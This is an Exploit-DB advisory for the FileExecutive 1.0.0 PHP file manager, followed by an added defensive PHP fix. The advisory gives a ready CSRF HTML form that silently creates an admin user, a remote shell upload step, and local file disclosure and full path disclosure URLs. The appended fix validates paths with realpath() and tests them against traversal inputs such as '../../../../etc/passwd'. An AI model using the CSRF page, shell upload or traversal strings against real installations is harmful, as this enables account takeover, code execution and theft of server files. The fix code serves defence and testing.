FileExecutive 1 - Multiple Vulnerabilities

EDB-ID: 11580
CVE: N/A
Author: ViRuSMaN
Type: webapps
Platform: AIX
Date: 2010-02-26


==============================================================================
        [»] Thx To : [ Jiko ,H.Scorpion ,Dr.Bahy ,T3rr0rist ,Golden-z3r0 ,Shr7 Team . ]
==============================================================================
        [»] FileExecutive Multiple Vulnerabilities
==============================================================================

    [»] Script:             [ FileExecutive v1.0.0 ]
    [»] Language:           [ PHP ]
    [»] Site page:          [ FileExecutive is a web-based file manager written in PHP. ]
    [»] Download:           [ http://sourceforge.net/projects/fileexecutive/ ]
    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & Islam-Defenders.Org ]
    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploits ]===

Add/Edit Admin CSRF:

<html>
<head>
<title>FileExecutive Remote Add Admin Exploit [By:MvM]</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>
<form action='http://localhost/scripts/file/admin/add_user.php' method='POST' onSubmit='return chk(this)'>
<th colspan='5'>Add A user<hr></th>
<td>Username:</td>
<input type='text' name='username' value='' maxlength='32' onkeyup="showHint(this.value)">
<Br>
<td>Password:</td>
<input type='text' name='password' value=''>
<Br>
<td>Name:</td>
<input type='text' name='name' value='' maxlength='32'>
<Br>
<td>Root Directory:</td>
<input type='text' name='root' value='' maxlength='200'>
<Br>
<td>Max Upload Size:</td>
<input type='text' name='uload_maxsize' value='' size='8'>
<Br>
<select name='multiplier'>
<option value='1' selected>Bytes</option>
<option value='1024'>KB</option>
<option value='1048576'>MB</option>
</select>
<td>Group:</td><td><select name='groupid' id='groupid'><option value='0' selected>No Group</option></select></td>
<td>Use Group permissions?</td><td>Yes:<input type='radio' name='grp_perms' value='1'></td><td>No:<input type='radio' name='grp_perms' value='0' id="abc" checked></td>
<td>Is user Admin?</td><td>Yes:<input type='radio' name='admin' value='1'></td><td>No:<input type='radio' name='admin' value='0' id="abc" checked>
<td colspan='2'><fieldset><legend>Permissions</legend>
<td><input type='checkbox' name='mkfile' value='1'>Create File</td>		<td><input type='checkbox' name='mkdir' value='1'>Create Folder</td>
<td><input type='checkbox' name='uload' value='1'>Upload</td>			<td><input type='checkbox' name='rename' value='1'>Rename</td>
<td><input type='checkbox' name='delete' value='1'>Delete</td>		<td><input type='checkbox' name='edit' value='1'>Edit</td>
<td><input type='checkbox' name='dload' value='1'>Download</td>		<td><input type='checkbox' name='chmod' value='1'>Chmod</td>
<td><input type='checkbox' name='move' value='1'>Move</td>			<td> </td></tr>
<td colspan='2'><input type='submit' value='Add User' name='sub'> <input type='button' value='Cancel' onclick='top.location="index.php"'></td>
</form>
</body>
</html>

Shell Upload:

    [»] Go to the end of the page and browse to your shell to upload it   <-=- Remote File Upload Vulnerability

Local File Disclosure:

    [»] http://localhost/[path]/download.php?file=./LFD            <-=- Local File Disclosure Vulnerability

Full Path Disclosure:

    [»] http://localhost/[path]/listdir.php?dir=./FPD              <-=- Full Path Disclosure Vulnerability

Author: ViRuSMaN <-

###########################################################################
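
One way to close the download.php?file= and listdir.php?dir= issues listed above, added here as an example and not taken from FileExecutive or from the advisory: resolve the parameter with realpath() and accept it only when the result stays inside the user's root directory. The function name, the sample directory layout and the assumption that the per-user "Root Directory" is the intended boundary are hypothetical.

```php
<?php
// Added example, not FileExecutive code. Function names and the
// constructed directory layout below are hypothetical.

/**
 * Resolve a user-supplied relative path against the user's root and
 * return the real path only if it stays inside that root, else null.
 */
function resolve_within_root(string $root, string $requested): ?string
{
    $rootReal = realpath($root);
    if ($rootReal === false || strpos($requested, "\0") !== false) {
        return null;
    }
    // realpath() collapses "." and "..", follows symlinks, and returns
    // false when the target does not exist.
    $target = realpath($rootReal . DIRECTORY_SEPARATOR . $requested);
    if ($target === false) {
        return null;
    }
    // Compare against the root plus a trailing separator, so a root of
    // .../alice does not also match the sibling .../alice2.
    $prefix = rtrim($rootReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($target !== $rootReal && strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// Constructed sample layout: <tmp>/alice is the user's root, <tmp>/alice2 is not.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'fe_demo_' . bin2hex(random_bytes(4));
mkdir("$base/alice/docs", 0700, true);
mkdir("$base/alice2", 0700, true);
file_put_contents("$base/alice/docs/notes.txt", 'user data');
file_put_contents("$base/alice2/secret.txt", 'other user data');

// Constructed values standing in for the file= / dir= parameters.
$samples = ['docs/notes.txt', 'docs', './docs/../docs/notes.txt',
            '../alice2/secret.txt', '../../../../etc/passwd', "docs/notes.txt\0.jpg"];
foreach ($samples as $param) {
    $path = resolve_within_root("$base/alice", $param);
    // A rejected request gets one generic answer (e.g. HTTP 404 "Not found"),
    // never the resolved server path or a raw PHP warning.
    printf("%-28s %s\n", addcslashes($param, "\0"), $path === null ? 'rejected' : 'allowed');
}
```

In download.php the accepted path should additionally pass is_file(), and in listdir.php is_dir(), before it is used. Keeping display_errors off in production prevents failed filesystem calls from printing server paths.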